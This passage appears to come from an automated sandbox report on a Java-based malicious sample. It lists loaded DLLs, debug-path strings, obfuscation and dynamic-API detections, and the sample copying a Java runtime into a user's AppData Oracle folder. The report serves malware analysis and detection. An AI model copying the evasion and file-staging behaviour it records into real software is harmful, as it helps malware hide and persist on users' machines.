Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699563884.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbi source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdbjj source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005000000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1741105307.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawtaccessbridge-32\JAWTAccessBridge-32.pdb source: xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700108241.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsspi_bridge\sspi_bridge.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb## source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb11 source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnpt\npt.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700293859.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699288851.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb:: source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
Binary contains a suspicious time stamp
Source: msvcp140.dll.21.dr Static PE information: 0xEDEDFA22 [Fri Jun 29 08:17:38 2096 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A945FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_73A945FB
PE file contains sections with non-standard names
Source: unpack200.exe.21.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFA21B push ecx; ret 2_2_02DFA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFA20A push ecx; ret 2_2_02DFA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFB3B7 push 00000000h; mov dword ptr [esp], esp 2_2_02DFB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFBB67 push 00000000h; mov dword ptr [esp], esp 2_2_02DFBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFB947 push 00000000h; mov dword ptr [esp], esp 2_2_02DFB96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFC477 push 00000000h; mov dword ptr [esp], esp 2_2_02DFC49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FC5E6 pushad ; retf 6_3_156FC5ED
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FCB90 pushad ; retf 6_3_156FCB91
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FCA72 push eax; retf 6_3_156FCA85
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FC61A pushad ; retf 6_3_156FC679
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FE8EA pushad ; retf 6_3_156FE8F9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FE8A2 pushad ; retf 6_3_156FE8B1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_1512832A pushad ; iretd 6_3_15128341
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_151299DC pushad ; retf 0028h 6_3_151299DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_15129AE3 push eax; retf 6_3_15129B0D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_1512832A pushad ; iretd 6_3_15128341
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_151299DC pushad ; retf 0028h 6_3_151299DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_15129AE3 push eax; retf 6_3_15129B0D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A92E75 push ecx; ret 6_2_73A92E88
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02978A11 push cs; retf 6_2_02978A31
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02981F88 push es; retn 0024h 6_2_02981F8B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_0297ECE0 pushfd ; iretd 6_2_0297ECE1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_0297D5FB push es; retn 0001h 6_2_0297D6FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DD8F7 push 00000000h; mov dword ptr [esp], esp 6_2_028DD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DA20A push ecx; ret 6_2_028DA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DA21B push ecx; ret 6_2_028DA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DB3B7 push 00000000h; mov dword ptr [esp], esp 6_2_028DB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DBB67 push 00000000h; mov dword ptr [esp], esp 6_2_028DBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DD8E0 push 00000000h; mov dword ptr [esp], esp 6_2_028DD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DB947 push 00000000h; mov dword ptr [esp], esp 6_2_028DB96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DC477 push 00000000h; mov dword ptr [esp], esp 6_2_028DC49D
Drops PE files
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll Jump to dropped file
